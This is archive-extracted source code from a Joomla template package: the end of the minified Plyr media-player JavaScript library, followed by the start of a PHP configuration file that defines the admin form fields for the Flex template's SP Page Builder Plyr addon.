le(){Ye.embed=e.SC.Widget(this),Ye.embed.bind(e.SC.Widget.Events.READY,function(){Ye.media.play=function(){Ye.embed.play(),Ye.media.paused=!1},Ye.media.pause=function(){Ye.embed.pause(),Ye.media.paused=!0},Ye.media.stop=function(){Ye.embed.seekTo(0),Ye.embed.pause(),Ye.media.paused=!0},Ye.media.paused=!0,Ye.media.currentTime=0,Ye.embed.getDuration(function(e){Ye.media.duration=e/1e3,se()}),Ye.embed.getPosition(function(e){Ye.media.currentTime=e,j(Ye.media,"timeupdate")}),Ye.embed.bind(e.SC.Widget.Events.PLAY,function(){Ye.media.paused=!1,j(Ye.media,"play"),j(Ye.media,"playing")}),Ye.embed.bind(e.SC.Widget.Events.PAUSE,function(){Ye.media.paused=!0,j(Ye.media,"pause")}),Ye.embed.bind(e.SC.Widget.Events.PLAY_PROGRESS,function(e){Ye.media.seeking=!1,Ye.media.currentTime=e.currentPosition/1e3,j(Ye.media,"timeupdate")}),Ye.embed.bind(e.SC.Widget.Events.LOAD_PROGRESS,function(e){Ye.media.buffered=e.loadProgress,j(Ye.media,"progress"),1===parseInt(e.loadProgress)&&j(Ye.media,"canplaythrough")}),Ye.embed.bind(e.SC.Widget.Events.FINISH,function(){Ye.media.paused=!0,j(Ye.media,"ended")})})}function ue(){"play"in Ye.media&&Ye.media.play()}function ce(){"pause"in Ye.media&&Ye.media.pause()}function de(e){return O.boolean(e)||(e=Ye.media.paused),e?ue():ce(),e}function pe(e){O.number(e)||(e=C.seekTime),fe(Ye.media.currentTime-e)}function me(e){O.number(e)||(e=C.seekTime),fe(Ye.media.currentTime+e)}function fe(e){var t=0,n=Ye.media.paused,r=ye();O.number(e)?t=e:O.object(e)&&s(["input","change"],e.type)&&(t=e.target.value/e.target.max*r),t<0?t=0:t>r&&(t=r),Pe(t);try{Ye.media.currentTime=t.toFixed(4)}catch(e){}if(s(C.types.embed,Ye.type)){switch(Ye.type){case"youtube":Ye.embed.seekTo(t);break;case"vimeo":Ye.embed.setCurrentTime(t.toFixed(0));break;case"soundcloud":Ye.embed.seekTo(1e3*t)}n&&ce(),j(Ye.media,"timeupdate"),Ye.media.seeking=!0,j(Ye.media,"seeking")}$e("Seeking to "+Ye.media.currentTime+" seconds"),W(t)}function ye(){var e=parseInt(C.duration),t=0;return null===Ye.media.duration||isNaN(Ye.media.duration)||(t=Ye.media.duration),isNaN(e)?t:e}function be(){m(Ye.container,C.classes.playing,!Ye.media.paused),m(Ye.container,C.classes.stopped,Ye.media.paused),Oe(Ye.media.paused)}function ve(){P={x:e.pageXOffset||0,y:e.pageYOffset||0}}function ge(){e.scrollTo(P.x,P.y)}function he(e){var n=N.supportsFullScreen;if(n){if(!e||e.type!==N.fullScreenEventName)return N.isFullScreen(Ye.container)?N.cancelFullScreen():(ve(),N.requestFullScreen(Ye.container)),void(Ye.isFullscreen=N.isFullScreen(Ye.container));Ye.isFullscreen=N.isFullScreen(Ye.container)}else Ye.isFullscreen=!Ye.isFullscreen,t.body.style.overflow=Ye.isFullscreen?"hidden":"";m(Ye.container,C.classes.fullscreen.active,Ye.isFullscreen),J(Ye.isFullscreen),Ye.buttons&&Ye.buttons.fullscreen&&w(Ye.buttons.fullscreen,Ye.isFullscreen),j(Ye.container,Ye.isFullscreen?"enterfullscreen":"exitfullscreen",!0),!Ye.isFullscreen&&n&&ge()}function ke(e){if(O.boolean(e)||(e=!Ye.media.muted),w(Ye.buttons.mute,e),Ye.media.muted=e,0===Ye.media.volume&&we(C.volume),s(C.types.embed,Ye.type)){switch(Ye.type){case"youtube":Ye.embed[Ye.media.muted?"mute":"unMute"]();break;case"vimeo":case"soundcloud":Ye.embed.setVolume(Ye.media.muted?0:parseFloat(C.volume/C.volumeMax))}j(Ye.media,"volumechange")}}function we(e){var t=C.volumeMax,n=C.volumeMin;if(O.undefined(e)&&(e=Ye.storage.volume),(null===e||isNaN(e))&&(e=C.volume),e>t&&(e=t),e<n&&(e=n),Ye.media.volume=parseFloat(e/t),Ye.volume.display&&(Ye.volume.display.value=e),s(C.types.embed,Ye.type)){switch(Ye.type){case"youtube":Ye.embed.setVolume(100*Ye.media.volume);break;case"vimeo":case"soundcloud":Ye.embed.setVolume(Ye.media.volume)}j(Ye.media,"volumechange")}0===e?Ye.media.muted=!0:Ye.media.muted&&e>0&&ke()}function xe(e){var t=Ye.media.muted?0:Ye.media.volume*C.volumeMax;O.number(e)||(e=C.volumeStep),we(t+e)}function Te(e){var t=Ye.media.muted?0:Ye.media.volume*C.volumeMax;O.number(e)||(e=C.volumeStep),we(t-e)}function Se(){var e=Ye.media.muted?0:Ye.media.volume*C.volumeMax;Ye.supported.full&&(Ye.volume.input&&(Ye.volume.input.value=e),Ye.volume.display&&(Ye.volume.display.value=e)),ne({volume:e}),m(Ye.container,C.classes.muted,0===e),Ye.supported.full&&Ye.buttons.mute&&w(Ye.buttons.mute,0===e)}function Ee(e){Ye.supported.full&&Ye.buttons.captions&&(O.boolean(e)||(e=-1===Ye.container.className.indexOf(C.classes.captions.active)),Ye.captionsEnabled=e,w(Ye.buttons.captions,Ye.captionsEnabled),m(Ye.container,C.classes.captions.active,Ye.captionsEnabled),j(Ye.container,Ye.captionsEnabled?"captionsenabled":"captionsdisabled",!0),ne({captionsEnabled:Ye.captionsEnabled}))}function _e(e){var t="waiting"===e.type;clearTimeout(Be.loading),Be.loading=setTimeout(function(){m(Ye.container,C.classes.loading,t),Oe(t)},t?250:0)}function Ce(e){if(Ye.supported.full){var t=Ye.progress.played,n=0,r=ye();if(e)switch(e.type){case"timeupdate":case"seeking":if(Ye.controls.pressed)return;n=x(Ye.media.currentTime,r),"timeupdate"===e.type&&Ye.buttons.seek&&(Ye.buttons.seek.value=n);break;case"playing":case"progress":t=Ye.progress.buffer,n=function(){var e=Ye.media.buffered;return e&&e.length?x(e.end(0),r):O.number(e)?100*e:0}()}Fe(t,n)}}function Fe(e,t){if(Ye.supported.full){if(O.undefined(t)&&(t=0),O.undefined(e)){if(!Ye.progress||!Ye.progress.buffer)return;e=Ye.progress.buffer}O.htmlElement(e)?e.value=t:e&&(e.bar&&(e.bar.value=t),e.text&&(e.text.innerHTML=t))}}function Ae(e,t){if(t){isNaN(e)&&(e=0),Ye.secs=parseInt(e%60),Ye.mins=parseInt(e/60%60),Ye.hours=parseInt(e/60/60%60);var n=parseInt(ye()/60/60%60)>0;Ye.secs=("0"+Ye.secs).slice(-2),Ye.mins=("0"+Ye.mins).slice(-2),t.innerHTML=(n?Ye.hours+":":"")+Ye.mins+":"+Ye.secs}}function Ie(){if(Ye.supported.full){var e=ye()||0;!Ye.duration&&C.displayDuration&&Ye.media.paused&&Ae(e,Ye.currentTime),Ye.duration&&Ae(e,Ye.duration),Me()}}function Ne(e){Ae(Ye.media.currentTime,Ye.currentTime),e&&"timeupdate"===e.type&&Ye.media.seeking||Ce(e)}function Pe(e){O.number(e)||(e=0);var t=x(e,ye());Ye.progress&&Ye.progress.played&&(Ye.progress.played.value=t),Ye.buttons&&Ye.buttons.seek&&(Ye.buttons.seek.value=t)}function Me(e){var t=ye();if(C.tooltips.seek&&Ye.progress.container&&0!==t){var n=Ye.progress.container.getBoundingClientRect(),r=0,a=C.classes.tooltip+"--visible";if(e)r=100/n.width*(e.pageX-n.left);else{if(!f(Ye.progress.tooltip,a))return;r=Ye.progress.tooltip.style.left.replace("%","")}r<0?r=0:r>100&&(r=100),Ae(t/100*r,Ye.progress.tooltip),Ye.progress.tooltip.style.left=r+"%",e&&s(["mouseenter","mouseleave"],e.type)&&m(Ye.progress.tooltip,a,"mouseenter"===e.type)}}function Oe(t){if(C.hideControls&&"audio"!==Ye.type){var n=0,r=!1,a=t,o=f(Ye.container,C.classes.loading);if(O.boolean(t)||(t&&t.type?(r="enterfullscreen"===t.type,a=s(["mousemove","touchstart","mouseenter","focus"],t.type),s(["mousemove","touchmove"],t.type)&&(n=2e3),"focus"===t.type&&(n=3e3)):a=f(Ye.container,C.classes.hideControls)),e.clearTimeout(Be.hover),a||Ye.media.paused||o){if(m(Ye.container,C.classes.hideControls,!1),Ye.media.paused||o)return;Ye.browser.isTouch&&(n=3e3)}a&&Ye.media.paused||(Be.hover=e.setTimeout(function(){(!Ye.controls.pressed&&!Ye.controls.hover||r)&&m(Ye.container,C.classes.hideControls,!0)},n))}}function Le(e){O.object(e)&&"sources"in e&&e.sources.length?(m(Ye.container,C.classes.ready,!1),ce(),Pe(),Fe(),qe(),De(function(){if(Ye.embed=null,l(Ye.media),"video"===Ye.type&&Ye.videoContainer&&l(Ye.videoContainer),Ye.container&&Ye.container.removeAttribute("class"),"type"in e&&(Ye.type=e.type,"video"===Ye.type)){var n=e.sources[0];"type"in n&&s(C.types.embed,n.type)&&(Ye.type=n.type)}switch(Ye.supported=A(Ye.type),Ye.type){case"video":Ye.media=t.createElement("video");break;case"audio":Ye.media=t.createElement("audio");break;case"youtube":case"vimeo":case"soundcloud":Ye.media=t.createElement("div"),Ye.embedId=e.sources[0].src}u(Ye.container,Ye.media),O.boolean(e.autoplay)&&(C.autoplay=e.autoplay),s(C.types.html5,Ye.type)&&(C.crossorigin&&Ye.media.setAttribute("crossorigin",""),C.autoplay&&Ye.media.setAttribute("autoplay",""),"poster"in e&&Ye.media.setAttribute("poster",e.poster),C.loop&&Ye.media.setAttribute("loop","")),m(Ye.container,C.classes.fullscreen.active,Ye.isFullscreen),m(Ye.container,C.classes.captions.active,Ye.captionsEnabled),Q(),s(C.types.html5,Ye.type)&&z("source",e.sources),re(),s(C.types.html5,Ye.type)&&("tracks"in e&&z("track",e.tracks),Ye.media.load()),(s(C.types.html5,Ye.type)||s(C.types.embed,Ye.type)&&!Ye.supported.full)&&(He(),Ue()),C.title=e.title,ee()},!1)):Je("Invalid source format")}function je(){m(X("."+C.classes.tabFocus),C.classes.tabFocus,!1)}function Re(){function n(){var e=de(),t=Ye.buttons[e?"play":"pause"],n=Ye.buttons[e?"pause":"play"];if(n&&(n=n.length>1?n[n.length-1]:n[0]),n){var r=f(t,C.classes.tabFocus);setTimeout(function(){n.focus(),r&&(m(t,C.classes.tabFocus,!1),m(n,C.classes.tabFocus,!0))},100)}}function r(){var e=t.activeElement;return e=e&&e!==t.body?t.querySelector(":focus"):null}function a(e){return e.keyCode?e.keyCode:e.which}function o(e){for(var t in Ye.buttons){var n=Ye.buttons[t];if(O.nodeList(n))for(var r=0;r<n.length;r++)m(n[r],C.classes.tabFocus,n[r]===e);else m(n,C.classes.tabFocus,n===e)}}function i(e){var t=a(e),n="keydown"===e.type,r=n&&t===u;if(O.number(t))if(n){switch(s([48,49,50,51,52,53,54,56,57,32,75,38,40,77,39,37,70,67],t)&&(e.preventDefault(),e.stopPropagation()),t){case 48:case 49:case 50:case 51:case 52:case 53:case 54:case 55:case 56:case 57:r||function(){var e=Ye.media.duration;O.number(e)&&fe(e/10*(t-48))}();break;case 32:case 75:r||de();break;case 38:xe();break;case 40:Te();break;case 77:r||ke();break;case 39:me();break;case 37:pe();break;case 70:he();break;case 67:r||Ee()}!N.supportsFullScreen&&Ye.isFullscreen&&27===t&&he(),u=t}else u=null}var l=Ye.browser.isIE?"change":"input";if(C.keyboardShorcuts.focused){var u=null;C.keyboardShorcuts.global&&g(e,"keydown keyup",function(e){var t=a(e),n=r();1!==I().length||!s([48,49,50,51,52,53,54,56,57,75,77,70,67],t)||O.htmlElement(n)&&y(n,C.selectors.editable)||i(e)}),g(Ye.container,"keydown keyup",i)}g(e,"keyup",function(e){var t=a(e),n=r();9===t&&o(n)}),g(t.body,"click",je);for(var c in Ye.buttons){var d=Ye.buttons[c];g(d,"blur",function(){m(d,"tab-focus",!1)})}b(Ye.buttons.play,"click",C.listeners.play,n),b(Ye.buttons.pause,"click",C.listeners.pause,n),b(Ye.buttons.restart,"click",C.listeners.restart,fe),b(Ye.buttons.rewind,"click",C.listeners.rewind,pe),b(Ye.buttons.forward,"click",C.listeners.forward,me),b(Ye.buttons.seek,l,C.listeners.seek,fe),b(Ye.volume.input,l,C.listeners.volume,function(){we(Ye.volume.input.value)}),b(Ye.buttons.mute,"click",C.listeners.mute,ke),b(Ye.buttons.fullscreen,"click",C.listeners.fullscreen,he),N.supportsFullScreen&&g(t,N.fullScreenEventName,he),b(Ye.buttons.captions,"click",C.listeners.captions,Ee),g(Ye.progress.container,"mouseenter mouseleave mousemove",Me),C.hideControls&&(g(Ye.container,"mouseenter mouseleave mousemove touchstart touchend touchcancel touchmove enterfullscreen",Oe),g(Ye.controls,"mouseenter mouseleave",function(e){Ye.controls.hover="mouseenter"===e.type}),g(Ye.controls,"mousedown mouseup touchstart touchend touchcancel",function(e){Ye.controls.pressed=s(["mousedown","touchstart"],e.type)}),g(Ye.controls,"focus blur",Oe,!0)),g(Ye.volume.input,"wheel",function(e){e.preventDefault();var t=e.webkitDirectionInvertedFromDevice,n=C.volumeStep/5;(e.deltaY<0||e.deltaX>0)&&(t?Te(n):xe(n)),(e.deltaY>0||e.deltaX<0)&&(t?xe(n):Te(n))})}function Ve(){if(g(Ye.media,"timeupdate seeking",Ne),g(Ye.media,"timeupdate",W),g(Ye.media,"durationchange loadedmetadata",Ie),g(Ye.media,"ended",function(){"video"===Ye.type&&C.showPosterOnEnd&&("video"===Ye.type&&U(),fe(),Ye.media.load())}),g(Ye.media,"progress playing",Ce),g(Ye.media,"volumechange",Se),g(Ye.media,"play pause ended",be),g(Ye.media,"waiting canplay seeked",_e),C.clickToPlay&&"audio"!==Ye.type){var e=X("."+C.classes.videoWrapper);if(!e)return;e.style.cursor="pointer",g(e,"click",function(){C.hideControls&&Ye.browser.isTouch&&!Ye.media.paused||(Ye.media.paused?ue():Ye.media.ended?(fe(),ue()):ce())})}C.disableContextMenu&&g(Ye.media,"contextmenu",function(e){e.preventDefault()}),g(Ye.media,C.events.concat(["keyup","keydown"]).join(" "),function(e){j(Ye.container,e.type,!0)})}function qe(){if(s(C.types.html5,Ye.type)){for(var e=Ye.media.querySelectorAll("source"),t=0;t<e.length;t++)l(e[t]);Ye.media.setAttribute("src",C.blankUrl),Ye.media.load(),$e("Cancelled network requests")}}function De(n,r){function a(){clearTimeout(Be.cleanUp),O.boolean(r)||(r=!0),O.function(n)&&n.call(Xe),r&&(Ye.init=!1,Ye.container.parentNode.replaceChild(Xe,Ye.container),Ye.container=null,t.body.style.overflow="",h(t.body,"click",je),j(Xe,"destroyed",!0))}if(!Ye.init)return null;switch(Ye.type){case"youtube":e.clearInterval(Be.buffering),e.clearInterval(Be.playing),Ye.embed.destroy(),a();break;case"vimeo":Ye.embed.unload().then(a),Be.cleanUp=e.setTimeout(a,200);break;case"video":case"audio":Z(!0),a()}}function He(){if(!Ye.supported.full)return Je("Basic support only",Ye.type),l(X(C.selectors.controls.wrapper)),l(X(C.selectors.buttons.play)),void Z(!0);var e=!B(C.selectors.controls.wrapper).length;e&&G(),K()&&(e&&Re(),Ve(),Z(),D(),H(),we(),Se(),Ne(),be(),Ie())}function Ue(){e.setTimeout(function(){j(Ye.media,"ready")},0),m(Ye.media,M.classes.setup,!0),m(Ye.container,C.classes.ready,!0),Ye.media.plyr=We,C.autoplay&&ue()}var We,Ye=this,Be={};Ye.media=v;var Xe=v.cloneNode(!0),$e=function(){R("log",arguments)},Je=function(){R("warn",arguments)};return $e("Config",C),We={getOriginal:function(){return Xe},getContainer:function(){return Ye.container},getEmbed:function(){return Ye.embed},getMedia:function(){return Ye.media},getType:function(){return Ye.type},getDuration:ye,getCurrentTime:function(){return Ye.media.currentTime},getVolume:function(){return Ye.media.volume},isMuted:function(){return Ye.media.muted},isReady:function(){return f(Ye.container,C.classes.ready)},isLoading:function(){return f(Ye.container,C.classes.loading)},isPaused:function(){return Ye.media.paused},on:function(e,t){return g(Ye.container,e,t),this},play:ue,pause:ce,stop:function(){ce(),fe()},restart:fe,rewind:pe,forward:me,seek:fe,source:function(e){if(O.undefined(e)){var t;switch(Ye.type){case"youtube":t=Ye.embed.getVideoUrl();break;case"vimeo":Ye.embed.getVideoUrl.then(function(e){t=e});break;case"soundcloud":Ye.embed.getCurrentSound(function(e){t=e.permalink_url});break;default:t=Ye.media.currentSrc}return t||""}Le(e)},poster:function(e){"video"===Ye.type&&Ye.media.setAttribute("poster",e)},setVolume:we,togglePlay:de,toggleMute:ke,toggleCaptions:Ee,toggleFullscreen:he,toggleControls:Oe,isFullscreen:function(){return Ye.isFullscreen||!1},support:function(e){return r(Ye,e)},destroy:De},function(){if(Ye.init)return null;if(N=_(),Ye.browser=n(),O.htmlElement(Ye.media)){te();var e=v.tagName.toLowerCase();"div"===e?(Ye.type=v.getAttribute("data-type"),Ye.embedId=v.getAttribute("data-video-id"),v.removeAttribute("data-type"),v.removeAttribute("data-video-id")):(Ye.type=e,C.crossorigin=null!==v.getAttribute("crossorigin"),C.autoplay=C.autoplay||null!==v.getAttribute("autoplay"),C.loop=C.loop||null!==v.getAttribute("loop")),Ye.supported=A(Ye.type),Ye.supported.basic&&(Ye.container=i(v,t.createElement("div")),Ye.container.setAttribute("tabindex",0),Q(),$e(Ye.browser.name+" "+Ye.browser.version),re(),(s(C.types.html5,Ye.type)||s(C.types.embed,Ye.type)&&!Ye.supported.full)&&(He(),Ue(),ee()),Ye.init=!0)}}(),Ye.init?We:null}function F(e,n){var r=new XMLHttpRequest;if(!O.string(n)||!O.htmlElement(t.querySelector("#"+n))){var a=t.createElement("div");a.setAttribute("hidden",""),O.string(n)&&a.setAttribute("id",n),t.body.insertBefore(a,t.body.childNodes[0]),"withCredentials"in r&&(r.open("GET",e,!0),r.onload=function(){a.innerHTML=r.responseText},r.send())}}function A(e){var r=n(),a=r.isIE&&r.version<=9,s=r.isIos,o=r.isIphone,i=!!t.createElement("audio").canPlayType,l=!!t.createElement("video").canPlayType,u=!1,c=!1;switch(e){case"video":c=(u=l)&&!a&&!o;break;case"audio":c=(u=i)&&!a;break;case"vimeo":u=!0,c=!a&&!s;break;case"youtube":u=!0,c=!a&&!s,s&&!o&&r.version>=10&&(c=!0);break;case"soundcloud":u=!0,c=!a&&!o;break;default:c=(u=i&&l)&&!a}return{basic:u,full:c}}function I(e){if(O.string(e)?e=t.querySelector(e):O.undefined(e)&&(e=t.body),O.htmlElement(e)){var n=e.querySelectorAll("."+M.classes.setup),r=[];return Array.prototype.slice.call(n).forEach(function(e){O.object(e.plyr)&&r.push(e.plyr)}),r}return[]}var N,P={x:0,y:0},M={enabled:!0,debug:!1,autoplay:!1,loop:!1,seekTime:10,volume:10,volumeMin:0,volumeMax:10,volumeStep:1,duration:null,displayDuration:!0,loadSprite:!0,iconPrefix:"plyr",iconUrl:"https://cdn.plyr.io/2.0.17/plyr.svg",blankUrl:"https://cdn.plyr.io/static/blank.mp4",clickToPlay:!0,hideControls:!0,showPosterOnEnd:!1,disableContextMenu:!0,keyboardShorcuts:{focused:!0,global:!1},tooltips:{controls:!1,seek:!0},selectors:{html5:"video, audio",embed:"[data-type]",editable:"input, textarea, select, [contenteditable]",container:".plyr",controls:{container:null,wrapper:".plyr__controls"},labels:"[data-plyr]",buttons:{seek:'[data-plyr="seek"]',play:'[data-plyr="play"]',pause:'[data-plyr="pause"]',restart:'[data-plyr="restart"]',rewind:'[data-plyr="rewind"]',forward:'[data-plyr="fast-forward"]',mute:'[data-plyr="mute"]',captions:'[data-plyr="captions"]',fullscreen:'[data-plyr="fullscreen"]'},volume:{input:'[data-plyr="volume"]',display:".plyr__volume--display"},progress:{container:".plyr__progress",buffer:".plyr__progress--buffer",played:".plyr__progress--played"},captions:".plyr__captions",currentTime:".plyr__time--current",duration:".plyr__time--duration"},classes:{setup:"plyr--setup",ready:"plyr--ready",videoWrapper:"plyr__video-wrapper",embedWrapper:"plyr__video-embed",type:"plyr--{0}",stopped:"plyr--stopped",playing:"plyr--playing",muted:"plyr--muted",loading:"plyr--loading",hover:"plyr--hover",tooltip:"plyr__tooltip",hidden:"plyr__sr-only",hideControls:"plyr--hide-controls",isIos:"plyr--is-ios",isTouch:"plyr--is-touch",captions:{enabled:"plyr--captions-enabled",active:"plyr--captions-active"},fullscreen:{enabled:"plyr--fullscreen-enabled",fallback:"plyr--fullscreen-fallback",active:"plyr--fullscreen-active"},tabFocus:"tab-focus"},captions:{defaultActive:!1},fullscreen:{enabled:!0,fallback:!0,allowAudio:!1},storage:{enabled:!0,key:"plyr"},controls:["play-large","play","progress","current-time","mute","volume","captions","fullscreen"],i18n:{restart:"Restart",rewind:"Rewind {seektime} secs",play:"Play",pause:"Pause",forward:"Forward {seektime} secs",played:"played",buffered:"buffered",currentTime:"Current time",duration:"Duration",volume:"Volume",toggleMute:"Toggle Mute",toggleCaptions:"Toggle Captions",toggleFullscreen:"Toggle Fullscreen",frameTitle:"Player for {title}"},types:{embed:["youtube","vimeo","soundcloud"],html5:["video","audio"]},urls:{vimeo:{api:"https://player.vimeo.com/api/player.js"},youtube:{api:"https://www.youtube.com/iframe_api"},soundcloud:{api:"https://w.soundcloud.com/player/api.js"}},listeners:{seek:null,play:null,pause:null,restart:null,rewind:null,forward:null,mute:null,volume:null,captions:null,fullscreen:null},events:["ready","ended","progress","stalled","playing","waiting","canplay","canplaythrough","loadstart","loadeddata","loadedmetadata","timeupdate","volumechange","play","pause","error","seeking","seeked","emptied"],logPrefix:"[Plyr]"},O={object:function(e){return null!==e&&"object"==typeof e},array:function(e){return null!==e&&"object"==typeof e&&e.constructor===Array},number:function(e){return null!==e&&("number"==typeof e&&!isNaN(e-0)||"object"==typeof e&&e.constructor===Number)},string:function(e){return null!==e&&("string"==typeof e||"object"==typeof e&&e.constructor===String)},boolean:function(e){return null!==e&&"boolean"==typeof e},nodeList:function(e){return null!==e&&e instanceof NodeList},htmlElement:function(e){return null!==e&&e instanceof HTMLElement},function:function(e){return null!==e&&"function"==typeof e},undefined:function(e){return null!==e&&void 0===e}},L={supported:function(){try{e.localStorage.setItem("___test","OK");var t=e.localStorage.getItem("___test");return e.localStorage.removeItem("___test"),"OK"===t}catch(e){return!1}return!1}()};return{setup:function(e,n){function r(e,t){f(t,M.classes.hook)||a.push({target:e,media:t})}var a=[],s=[],o=[M.selectors.html5,M.selectors.embed].join(",");if(O.string(e)?e=t.querySelectorAll(e):O.htmlElement(e)?e=[e]:O.nodeList(e)||O.array(e)||O.string(e)||(O.undefined(n)&&O.object(e)&&(n=e),e=t.querySelectorAll(o)),O.nodeList(e)&&(e=Array.prototype.slice.call(e)),!A().basic||!e.length)return!1;for(var i=0;i<e.length;i++){var l=e[i],u=l.querySelectorAll(o);if(u.length)for(var c=0;c<u.length;c++)r(l,u[c]);else y(l,o)&&r(l,l)}return a.forEach(function(e){var t=e.target,r=e.media,a={};try{a=JSON.parse(t.getAttribute("data-plyr"))}catch(e){}var o=T({},M,n,a);if(!o.enabled)return null;var i=new C(r,o);if(O.object(i)){if(o.debug){var l=o.events.concat(["setup","statechange","enterfullscreen","exitfullscreen","captionsenabled","captionsdisabled"]);g(i.getContainer(),l.join(" "),function(e){console.log([o.logPrefix,"event:",e.type].join(" "),e.detail.plyr)})}k(i.getContainer(),"setup",!0,{plyr:i}),s.push(i)}}),s},supported:A,loadSprite:F,get:I}}),function(){function e(e,t){t=t||{bubbles:!1,cancelable:!1,detail:void 0};var n=document.createEvent("CustomEvent");return n.initCustomEvent(e,t.bubbles,t.cancelable,t.detail),n}"function"!=typeof window.CustomEvent&&(e.prototype=window.Event.prototype,window.CustomEvent=e)}();PK!Vx$N  (flex/sppagebuilder/addons/plyr/admin.phpnu&1i�<?php
/**
 * Flex @package SP Page Builder
 * Template Name - Flex
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2017 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
// no direct access
defined('_JEXEC') or die;

SpAddonsConfig::addonConfig(
	array(
		'type'=>'content',
		'addon_name'=>'sp_plyr',
		'title'=>JText::_('FLEX_ADDON_PLYR'),
		'desc'=>JText::_('FLEX_ADDON_PLYR_DESC'),
		'category'=>'Flex',
		'attr'=>array(
			'general' => array(

				'admin_label'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_ADMIN_LABEL_DESC'),
					'std'=> ''
				),

				'title'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_DESC'),
					'std'=>  ''
					),
	
				'heading_selector'=>array(
					'type'=>'select',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_DESC'),
					'values'=>array(
						'h1'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H1'),
						'h2'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H2'),
						'h3'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H3'),
						'h4'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H4'),
						'h5'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H5'),
						'h6'=>JText::_('COM_SPPAGEBUILDER_ADDON_HEADINGS_H6'),
					),
					'std'=>'h4',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_fontsize'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_SIZE_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_fontweight'=>array(
					'type'=>'text',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_FONT_WEIGHT_DESC'),
					'std'=>'',
					'depends'=>array(array('title', '!=', '')),
				),
	
				'title_text_color'=>array(
					'type'=>'color',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_TEXT_COLOR_DESC'),
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_top'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_TOP_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),

				'title_margin_bottom'=>array(
					'type'=>'number',
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM'),
					'desc'=>JText::_('COM_SPPAGEBUILDER_ADDON_TITLE_MARGIN_BOTTOM_DESC'),
					'placeholder'=>'10',
					'depends'=>array(array('title', '!=', '')),
				),
				'separator1'=>array(
					'type'=>'separator', 
					'title'=>JText::_('FLEX_ADDON_PLYR_SEPARATOR_MEDIA')
					),	
				'media'=>array(
					'type'=>'select', 
					'title'=>JText::_('FLEX_ADDON_PLYR_MEDIA'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_MEDIA_DESC'),
					'values'=> array(	
						'1'=>JText::_('FLEX_VIDEO'),
						'2'=>JText::_('FLEX_AUDIO'),
						'3'=>JText::_('FLEX_YOUTUBE_VIMEO')
					),
					'std'=>'1'
					),
					
				'video'=>array(
					'type'=>'text', 
					'title'=>JText::_('FLEX_ADDON_PLYR_VIDEO_URL'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_VIDEO_URL_DESC'),
					'placeholder'=>JText::_('FLEX_ADDON_PLYR_VIDEO_URL_PLACEHOLDER'),
					'std'=>'',
					'depends'=>array('media'=>'1')
					),
				'video_poster'=>array(
					'type'=>'text', 
					'title'=>JText::_('FLEX_ADDON_PLYR_VIDEO_POSTER'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_VIDEO_POSTER_DESC'),
					'placeholder'=>JText::_('FLEX_ADDON_PLYR_VIDEO_POSTER_PLACEHOLDER'),
					'std'=>'',
					'depends'=>array('media'=>'1')
					),
					
				'captions'=>array(
					'type'=>'text', 
					'title'=>JText::_('FLEX_ADDON_PLYR_CAPTIONS'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_CAPTIONS_DESC'),
					'placeholder'=>JText::_('FLEX_ADDON_PLYR_CAPTIONS_PLACEHOLDER'),
					'std'=>'',
					'depends'=>array('media'=>'1')
					),
				'captions_lang_label'=>array(
					'type'=>'text', 
					'title'=>JText::_('Language Label for Captions'),
					'desc'=>JText::_('Specifies the title of the text track. Here you can insert your desired language for captions. For example: “English” or “English captions”.'),
					'placeholder'=>JText::_('English'),
					'std'=>'',
					'depends'=>array('media'=>'1')
				),
					
				'captions_srclang'=>array(
					'type'=>'text', 
					'title'=>JText::_('Language for captions'),
					'desc'=>JText::_('Specifies the language of the track text data. For example “en” for English language.'),
					'placeholder'=>JText::_('en'),
					'std'=>'',
					'depends'=>array('media'=>'1')
				),
				
				'audio'=>array(
					'type'=>'text', 
					'title'=>JText::_('FLEX_ADDON_PLYR_AUDIO_URL'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_AUDIO_URL_DESC'),
					'placeholder'=>JText::_('FLEX_ADDON_PLYR_AUDIO_URL_PLACEHOLDER'),
					'std'=>'',
					'depends'=>array('media'=>'2')
				),	
					
				'youtube_vimeo_url'=>array(
					'type'=>'text', 
					'title'=>JText::_('COM_SPPAGEBUILDER_ADDON_VIDEO_URL'),
					'desc'=>JText::_('FLEX_ADDON_PLYR_YOUTUBE_VIMEO_URL_DESC'),
